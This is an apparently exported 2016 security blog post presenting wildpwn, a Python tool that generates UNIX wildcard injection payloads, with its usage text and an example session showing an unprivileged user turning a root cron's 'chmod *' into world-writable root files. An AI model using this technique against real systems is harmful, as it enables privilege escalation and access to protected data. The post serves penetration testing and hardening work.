{"id":4130,"date":"2016-05-27T23:56:01","date_gmt":"2016-05-27T15:56:01","guid":{"rendered":"https:\/\/www.darknet.org.uk\/?p=4130"},"modified":"2016-05-06T02:56:42","modified_gmt":"2016-05-05T18:56:42","slug":"wildpwn-unix-wildcard-attack-tool","status":"publish","type":"post","link":"https:\/\/www.darknet.org.uk\/2016\/05\/wildpwn-unix-wildcard-attack-tool\/","title":{"rendered":"wildpwn – UNIX Wildcard Attack Tool"},"content":{"rendered":"
wildpwn is a Python UNIX wildcard attack tool that helps you generate attacks, based on a paper by Leon Juranic. It’s considered a fairly old-skool attack vector, but it still works quite often.\n
The simple trick behind this technique is that when shell wildcards, especially the asterisk (*), are used, the UNIX shell expands them into filenames, and any file whose name begins with a hyphen (-) is passed to the command or program as a command-line argument and parsed as an option. That leaves space for some variations of the classic channelling attack.\n
The practical case for this technique is combining arguments and filenames, as different “channels”, into a single entity by means of shell wildcards.\n
Read the full paper here: Back To The Future: Unix Wildcards Gone Wild\n You can download wildpwn here:\nUsage\n
usage: wildpwn.py [-h] [--file FILE] payload folder\r\n\r\nTool to generate unix wildcard attacks\r\n\r\npositional arguments:\r\n payload Payload to use: (combined | tar | rsync)\r\n folder Where to write the payloads\r\n\r\noptional arguments:\r\n -h, --help show this help message and exit\r\n --file FILE Path to file for taking ownership \/ change permissions. Use it\r\n with combined attack only.\n
Usage Example\n
$ ls -lh \/tmp\/very_secret_file\r\n-rw-r--r-- 1 root root 2048 jun 28 21:37 \/tmp\/very_secret_file\r\n\r\n$ ls -lh .\/pwn_me\/\r\ndrwxrwxrwx 2 root root 4,0K jun 28 21:38 .\r\n[...]\r\n-rw-rw-r-- 1 root root 1024 jun 28 21:38 secret_file_1\r\n-rw-rw-r-- 1 root root 1024 jun 28 21:38 secret_file_2\r\n[...]\r\n\r\n$ python wildpwn.py --file \/tmp\/very_secret_file combined .\/pwn_me\/\r\n[!] Selected payload: combined\r\n[+] Done! Now wait for something like: chown uid:gid * (or) chmod [perms] * on .\/pwn_me\/. Good luck!\r\n\r\n[...time passes \/ some cron gets executed...]\r\n\r\n# chmod 000 * (for example)\r\n\r\n[...back with the unprivileged user...]\r\n\r\n$ ls -lha .\/pwn_me\/\r\n[...]\r\n-rwxrwxrwx 1 root root 1024 jun 28 21:38 secret_file_1\r\n-rwxrwxrwx 1 root root 1024 jun 28 21:38 secret_file_2\r\n[...]\r\n\r\n$ ls -lha \/tmp\/very_secret_file\r\n-rwxrwxrwx 1 root root 2048 jun 28 21:38 \/tmp\/very_secret_file\n